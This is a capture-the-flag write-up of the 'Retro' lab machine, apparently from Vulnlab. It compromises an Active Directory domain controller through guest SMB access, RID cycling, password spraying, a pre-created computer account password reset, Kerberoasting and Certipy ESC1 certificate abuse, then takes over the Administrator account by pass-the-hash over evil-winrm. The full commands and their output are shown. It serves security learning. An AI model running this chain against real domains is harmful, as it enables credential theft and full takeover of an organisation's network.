Overview

Retro is an easy windows machine created by r0BIT which starts off with RID cycling to get a list of usernames. One of the users uses the username as their password. I find a refrence to Pre-Created computer accounts in an SMB share. After some enum I changed the password for a Pre-Created computer account to abuse an ESC1 vulnerability for the NT hash of Administrator. I’ll use the NT hash over WinRM for a shell and the root flag.

Nmap Scan

I’ll run nmap to get started:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
獣 ~/vl/Retro/scans/tcp ➜ nmap -sCV --top-ports 10000 -T4 -vvvv 10.10.71.94 -oA retro
# Nmap 7.94SVN scan initiated Wed Oct 30 05:12:56 2024 as: /usr/lib/nmap/nmap -sCV --top-ports 10000 -T4 -vvvv -oA retro 10.10.71.94
Nmap scan report for 10.10.71.94
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2024-10-30 05:12:57 EDT for 131s
Not shown: 8355 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-30 09:13:40Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after:  2025-10-30T08:57:36
| MD5:   c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after:  2025-10-30T08:57:36
| MD5:   c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after:  2025-10-30T08:57:36
| MD5:   c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-30T08:57:36
| Not valid after:  2025-10-30T08:57:36
| MD5:   c303:f2c3:9161:7f9e:92d5:f1ee:0f5b:d696
| SHA-1: c028:6f27:3e9a:a0e1:46b8:3c86:cda6:0893:1946:dab6
...snip...
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-10-30T09:14:22+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Issuer: commonName=DC.retro.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-10-29T09:06:30
| Not valid after:  2025-04-30T09:06:30
| MD5:   5019:f099:2d34:10ea:2a93:313d:0faf:606d
| SHA-1: 0b4c:2073:7f03:060b:2f90:66b6:daa1:bbc7:1766:f22e
...snip...
|_ssl-date: 2024-10-30T09:15:02+00:00; -4s from scanner time.
9389/tcp open  mc-nmf        syn-ack ttl 127 .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-10-30T09:14:25
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 17105/tcp): CLEAN (Timeout)
|   Check 2 (port 10686/tcp): CLEAN (Timeout)
|   Check 3 (port 61857/udp): CLEAN (Timeout)
|   Check 4 (port 28280/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -4s, deviation: 0s, median: -4s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 30 05:15:08 2024 -- 1 IP address (1 host up) scanned in 132.37 seconds

I can see all of the normal ports that would be open on a DC. I’ll start with SMB most likely. I do see a CA retro-DC-CA, which hints at ADCS maybe being a later step.

Recon

445 - SMB

I’ll try Guest authentication in SMB:

1
2
3
4
5
6
7
8
9
10
11
12
13
獣 ~/vl/Retro/enumeration ➜ nxc smb 10.10.71.94 -u Guest -p '' --shares
SMB         10.10.71.94     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.71.94     445    DC               [+] retro.vl\Guest:
SMB         10.10.71.94     445    DC               [*] Enumerated shares
SMB         10.10.71.94     445    DC               Share           Permissions     Remark
SMB         10.10.71.94     445    DC               -----           -----------     ------
SMB         10.10.71.94     445    DC               ADMIN$                          Remote Admin
SMB         10.10.71.94     445    DC               C$                              Default share
SMB         10.10.71.94     445    DC               IPC$            READ            Remote IPC
SMB         10.10.71.94     445    DC               NETLOGON                        Logon server share
SMB         10.10.71.94     445    DC               Notes
SMB         10.10.71.94     445    DC               SYSVOL                          Logon server share
SMB         10.10.71.94     445    DC               Trainees        READ

This works, I’ll look in the Trainees share:

1
2
3
4
5
6
7
8
9
獣 ~/vl/Retro/enumeration ➜ impacket-smbclient 10.10.71.94
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Sun Jul 23 18:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 05:54:14 2023 ..
-rw-rw-rw-        288  Sun Jul 23 18:16:11 2023 Important.txt

There’s one file, Important.txt:

1
2
3
4
5
6
7
8
9
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

Seems like the Administrator bundled all of the Trainees into one user.

Auth as trainee

Getting Creds

I’ll use lookupsid.py to get a list of users. I first need the FQDN so I’ll put it in my /etc/hosts:

1
10.10.71.94	DC.retro.vl retro.vl

Now I can run lookupsid.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
獣 ~/vl/Retro/enumeration ➜ lookupsid.py retro.vl/Guest@DC.retro.vl 2000 -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at DC.retro.vl
[*] StringBinding ncacn_np:DC.retro.vl[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2983547755-698260136-4283918172
498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: RETRO\Administrator (SidTypeUser)
501: RETRO\Guest (SidTypeUser)
502: RETRO\krbtgt (SidTypeUser)
512: RETRO\Domain Admins (SidTypeGroup)
513: RETRO\Domain Users (SidTypeGroup)
514: RETRO\Domain Guests (SidTypeGroup)
515: RETRO\Domain Computers (SidTypeGroup)
516: RETRO\Domain Controllers (SidTypeGroup)
517: RETRO\Cert Publishers (SidTypeAlias)
518: RETRO\Schema Admins (SidTypeGroup)
519: RETRO\Enterprise Admins (SidTypeGroup)
520: RETRO\Group Policy Creator Owners (SidTypeGroup)
521: RETRO\Read-only Domain Controllers (SidTypeGroup)
522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
525: RETRO\Protected Users (SidTypeGroup)
526: RETRO\Key Admins (SidTypeGroup)
527: RETRO\Enterprise Key Admins (SidTypeGroup)
553: RETRO\RAS and IAS Servers (SidTypeAlias)
571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
1000: RETRO\DC$ (SidTypeUser)
1101: RETRO\DnsAdmins (SidTypeAlias)
1102: RETRO\DnsUpdateProxy (SidTypeGroup)
1104: RETRO\trainee (SidTypeUser)
1106: RETRO\BANKING$ (SidTypeUser)
1107: RETRO\jburley (SidTypeUser)
1108: RETRO\HelpDesk (SidTypeGroup)
1109: RETRO\tblack (SidTypeUser)

I can see a few users:

1
2
3
4
tblack
jburley
BANKING$
trainee

I’ll password spray the username as the password via kerbrute:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
獣 ~/vl/Retro/enumeration ➜ kerbrute passwordspray --dc DC.retro.vl -d retro.vl users.txt --user-as-pass

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/30/24 - Ronnie Flathers @ropnop

2024/10/30 05:24:25 >  Using KDC(s):
2024/10/30 05:24:25 >  	DC.retro.vl:88

2024/10/30 05:24:26 >  [+] VALID LOGIN:	 trainee@retro.vl:trainee
2024/10/30 05:24:26 >  Done! Tested 4 logins (1 successes) in 0.695 seconds

There’s one valid login for the trainee user, I’ll test auth over SMB:

1
2
3
4
5
6
7
8
9
10
11
12
13
獣 ~/vl/Retro/enumeration ➜ nxc smb DC.retro.vl -u trainee -p 'trainee' --shares
SMB         10.10.71.94     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.71.94     445    DC               [+] retro.vl\trainee:trainee
SMB         10.10.71.94     445    DC               [*] Enumerated shares
SMB         10.10.71.94     445    DC               Share           Permissions     Remark
SMB         10.10.71.94     445    DC               -----           -----------     ------
SMB         10.10.71.94     445    DC               ADMIN$                          Remote Admin
SMB         10.10.71.94     445    DC               C$                              Default share
SMB         10.10.71.94     445    DC               IPC$            READ            Remote IPC
SMB         10.10.71.94     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.71.94     445    DC               Notes           READ
SMB         10.10.71.94     445    DC               SYSVOL          READ            Logon server share
SMB         10.10.71.94     445    DC               Trainees        READ

Auth as BANKING$

Research

Now I can look at the Notes share:

1
2
3
4
5
6
7
8
9
10
獣 ~/vl/Retro/enumeration ➜ impacket-smbclient retro.vl/trainee@10.10.71.94
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# use notes
# ls
drw-rw-rw-          0  Sun Jul 23 18:03:16 2023 .
drw-rw-rw-          0  Wed Jul 26 05:54:14 2023 ..
-rw-rw-rw-        248  Sun Jul 23 18:05:56 2023 ToDo.txt

There’s a ToDo.txt file:

1
2
3
4
5
6
7
8
9
Thomas,

after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.

Best

James

I see one pretty interesting mention in this file:

1
pre created computer account

I found an article about these types of computer accounts.

Auth as BANKING$ (Intended)

From reading this article, I see that Pre-Created computer accounts use the computer account name in lowercase as the password. I can test this via nxc:

1
2
3
獣 ~/vl/Retro/enumeration ➜ nxc smb DC.retro.vl -u BANKING$ -p 'banking' --shares
SMB         10.10.71.94     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.71.94     445    DC               [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT

Reading further down in the article shows that I need to change the password for this computer account to be able to use it. I’ll do this by changing my /etc/krb5.conf file to be able to use kpasswd. Here’s my /etc/krb5.conf file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
[libdefaults]
        default_realm = RETRO.VL
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
        fcc-mit-ticketflags = true
        dns_canonicalize_hostname = false
        dns_lookup_realm = false
        dns_lookup_kdc = true
        k5login_authoritative = false
[realms]
        RETRO.VL = {
                kdc = DC.retro.vl
                admin_server = retro.vl
                default_admin = retro.vl
        }
[domain_realm]
        .retro.vl = RETRO.VL

Now I can run kpasswd:

1
2
3
4
5
獣 ~/vl/Retro/enumeration ➜ kpasswd BANKING$
Password for BANKING$@RETRO.VL:
Enter new password: banking
Enter it again: S3cur3P4ssw0rd!
Password changed.

I can test auth with the password S3cur3P4ssw0rd! now:

1
2
3
4
5
6
7
8
9
10
11
12
13
獣 ~/vl/Retro/enumeration ➜ nxc smb DC.retro.vl -u BANKING$ -p 'S3cur3P4ssw0rd!' --shares
SMB         10.10.71.94     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         10.10.71.94     445    DC               [+] retro.vl\BANKING$:S3cur3P4ssw0rd!
SMB         10.10.71.94     445    DC               [*] Enumerated shares
SMB         10.10.71.94     445    DC               Share           Permissions     Remark
SMB         10.10.71.94     445    DC               -----           -----------     ------
SMB         10.10.71.94     445    DC               ADMIN$                          Remote Admin
SMB         10.10.71.94     445    DC               C$                              Default share
SMB         10.10.71.94     445    DC               IPC$            READ            Remote IPC
SMB         10.10.71.94     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.71.94     445    DC               Notes           READ
SMB         10.10.71.94     445    DC               SYSVOL          READ            Logon server share
SMB         10.10.71.94     445    DC               Trainees        READ

Auth as BANKING$ (via GetUserSPNs.py)

A different way of getting the password for BANKING$ (kinda useless) would be through GetUserSPNs.py:

1
2
3
4
5
6
7
8
9
獣 ~/vl/Retro/enumeration ➜ GetUserSPNs.py -usersfile users.txt -dc-host 10.10.71.94 retro.vl/trainee@DC.retro.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[-] CCache file is not found. Skipping...
[-] Principal: tblack - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jburley - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*BANKING$$RETRO.VL$BANKING$*$6a8d366751674e175eb40197ea094ab8$9fc0c9b5bb2dbf802b41...snip...90ee6b73a3dd58127cd0af00434715fe251a62c1cd30ffceb640c587f7d2798d2c6f9d53815a51092874dfbaaf5f7988050f656
[-] Principal: trainee - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

As you can see, I got the hash for BANKING$. I can run this through hashcat and it cracks sucessfully. Although this method isn’t really anywhere near close to an “Unintended”, its still a cool find. And after this you’d still just do kpasswd and go from there.

Shell as Administrator

ADCS Enum

Seeing as I can’t view any other SMB shares, and I can’t WinRM or anything. I’ll run certipy-ad to look for vulnerable templates:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
獣 ~/vl/Retro/enumeration ➜ certipy-ad find -target DC.retro.vl -u trainee'@'retro.vl -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Trying to get CA configuration for 'retro-DC-CA' via CSRA
[!] Got error while trying to get CA configuration for 'retro-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'retro-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'retro-DC-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : retro-DC-CA
    DNS Name                            : DC.retro.vl
    Certificate Subject                 : CN=retro-DC-CA, DC=retro, DC=vl
    Certificate Serial Number           : 7A107F4C115097984B35539AA62E5C85
    Certificate Validity Start          : 2023-07-23 21:03:51+00:00
    Certificate Validity End            : 2028-07-23 21:13:50+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : RETRO.VL\Administrators
      Access Rights
        ManageCertificates              : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        ManageCa                        : RETRO.VL\Administrators
                                          RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
        Enroll                          : RETRO.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : None
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

There’s an ESC1 for Domain Computers, we have a the BANKING$ account which would work but this still seems interesting. I’ll check the MAQ (MachineAccountQuota) just to be sure that I can’t just create a new computer account instead of using BANKING$:

1
2
3
4
5
獣 ~/Documents/hexo ➜ nxc ldap DC.retro.vl -u trainee -p trainee -M maq
SMB         10.10.71.94     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
LDAP        10.10.71.94     389    DC               [+] retro.vl\trainee:trainee
MAQ         10.10.71.94     389    DC               [*] Getting the MachineAccountQuota
MAQ         10.10.71.94     389    DC               MachineAccountQuota: 0

The MAQ is 0, so I’ll have to use BANKING$ for the ESC1.

ESC1

I’ll abuse the ESC1 via certipy-ad by requesting the vulnerable template with the upn of administrator@retro.vl:

1
2
3
4
5
6
7
8
9
獣 ~/vl/Retro/enumeration ➜ certipy-ad req -u 'banking$'@retro.vl -template "RetroClients" -ca retro-DC-CA -upn administrator@retro.vl
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 11
Would you like to save the private key? (y/N) N
[-] Failed to request certificate

I get a keysize error, I’ll update the keysize to 4096:

1
2
3
4
5
6
7
8
9
10
獣 ~/vl/Retro/enumeration ➜ certipy-ad req -u 'banking$'@retro.vl -template "RetroClients" -ca retro-DC-CA -upn administrator@retro.vl -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

Password:
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 12
[*] Got certificate with UPN 'administrator@retro.vl'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Now I can use this to get the NT hash for Administrator:

1
2
3
4
5
6
7
8
9
獣 ~/vl/Retro/enumeration ➜ certipy-ad auth -pfx administrator.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:<redacted>

Shell as Administrator

With this I can WinRM to the machine:

1
2
3
4
5
6
7
8
9
10
獣 ~/vl/Retro/enumeration ➜ evil-winrm -i DC.retro.vl -u Administrator -H '<redacted>'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And with that I can get the root flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2023  12:38 PM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{<redacted>}

Thoughts

Retro was a really good machine in my opinion, I didn’t know anything about Pre-Created computer accounts until I did this machine. This was also one of the first machines I came across that required a keysize when exploiting the ESC1 vulnerability, so it was good to be exposed on figuring out how to do that.